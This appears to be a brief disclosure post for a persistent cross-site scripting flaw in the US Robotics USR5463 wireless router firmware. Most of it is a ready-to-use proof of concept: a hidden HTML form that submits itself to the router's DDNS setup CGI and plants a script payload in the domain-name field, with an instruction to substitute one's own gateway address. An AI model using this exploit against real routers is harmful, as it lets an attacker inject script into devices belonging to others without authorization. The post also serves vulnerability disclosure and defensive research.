Hi! This bug was finded in the USR5463 802.11g Wireless Router. <!-- Author: SH4V BUG: permanent XSS Firmware: USR5463-v0_01.bin - USR5463-v0_06.bin Router: USR5463 802.11g Wireless Router Company: US Robotics Just change http://192.168.2.1/ by your current gateway. --> <form action="http://192.168.2.1/cgi-bin/setup_ddns.exe"; method="post"> <input type=hidden name="ddns_domainame" value='"><script>alert(1)</script>'> <input type=hidden name="ddns_account" value=''> <input type=password size=1 name="ddns_password" value=''> </form> <script>document.forms[0].submit()</script> Regards, David K.
